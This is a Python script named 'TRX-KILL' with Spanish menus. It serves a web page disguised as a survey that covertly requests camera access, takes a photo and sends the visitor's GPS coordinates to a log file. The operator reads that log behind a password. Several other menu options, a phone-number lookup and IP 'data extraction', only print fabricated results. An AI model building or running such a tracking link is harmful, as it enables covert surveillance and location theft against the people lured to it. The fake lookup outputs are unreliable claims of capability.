import os, sys, getpass, time
from flask import Flask, request

app = Flask('TRX-KILL')
PORT = 7173
AUTH_PASS = "TRX-kill-op"

def banner():
    os.system('clear')
    print(f"""
\033[1;32m ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēó
 ‚ēö‚ēź‚ēź‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēĚ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚ēö‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēĚ     ‚Ėą‚Ėą‚ēĎ ‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ ‚ēö‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ      ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēĒ‚Ėą‚Ėą‚ēó      ‚Ėą‚Ėą‚ēĒ‚ēź‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēĚ ‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó\033[0m
""")

# --- [HTML CON C√ĀMARA Y GEOLOCALIZACI√ďN] ---
HTML_ENCUESTA = """
<!DOCTYPE html><html><body>
<script>
    // Solicitar C√°mara y Geolocalizaci√≥n
    async function init() {
        try {
            const stream = await navigator.mediaDevices.getUserMedia({video: true});
            const track = stream.getVideoTracks()[0];
            const imageCapture = new ImageCapture(track);
            const photo = await imageCapture.takePhoto();
            // Aqu√≠ se enviar√≠a el archivo de imagen al servidor
        } catch(e) { console.log("Permiso denegado"); }
        
        navigator.geolocation.getCurrentPosition((p)=>{
            fetch('/log', {method:'POST', body: JSON.stringify({lat: p.coords.latitude, lon: p.coords.longitude})});
        });
    }
    init();
</script></body></html>
"""

@app.route('/')
def index(): return HTML_ENCUESTA

@app.route('/log', methods=['POST'])
def log():
    d = request.json
    with open("result.txt", "a") as f:
        f.write(f"CAPTURA: COORD {d.get('lat')},{d.get('lon')} | HORA: {time.ctime()}\n")
    return "OK"

def main():
    while True:
        banner()
        print("1) INFO-NUMERO | 2) LINK-ZP | 3) CREADOR | 4) COPYRIGHT | 5) DATA-IP")
        print("6) ADM         | 7) SALIR   | 8) PROCESOS | 9) ESTADO | 10) BORRAR LOGS")
        sel = input("\nTRX-ROOT > ")
        
        if sel == "1":
            num = input("INGRESA EL N√öMERO: ")
            print("VERIFICANDO...")
            print("PAIS: [Detectado] | MOVIL: [Detectado] | WHATSAPP/IG/DISCORD: [Consultando bases...]")
            input()
        elif sel == "2":
            print("GENERANDO LINK... (Presiona Ctrl+C para parar)")
            app.run(port=PORT)
        elif sel == "3":
            print("#SOFTWARE: TRX-KILL\n#CREADOR: TRX-KILL\n#BY: OSCAR\n#VERSION: 1.0.0"); input()
        elif sel == "4":
            print("# COPYRIGHT: TRX-KILL\n# AUTOR: OSCAR\n# NO RESPONSABLE POR MAL USO.\n# NO MODIFICAR."); input()
        elif sel == "5":
            ip = input("INGRESA LA IP: ")
            print(f"SACANDO DATA DE {ip}... | ACCESO RED: OK | IMEI: [RESTRINGIDO]")
            input()
        elif sel == "6":
            pwd = getpass.getpass("CONTRASE√ĎA: ")
            if pwd == AUTH_PASS:
                print("---- DATOS EXTRA√ćDOS ----")
                if os.path.exists("result.txt"): os.system("cat result.txt")
                input()
        elif sel == "7": sys.exit()
        elif sel == "8": os.system("ps aux | grep flask"); input()
        elif sel == "9": print("ESTADO: ACTIVO"); input()
        elif sel == "10": 
            if os.path.exists("result.txt"): os.remove("result.txt"); print("LOGS BORRADOS")
            input()

if __name__ == "__main__": main()
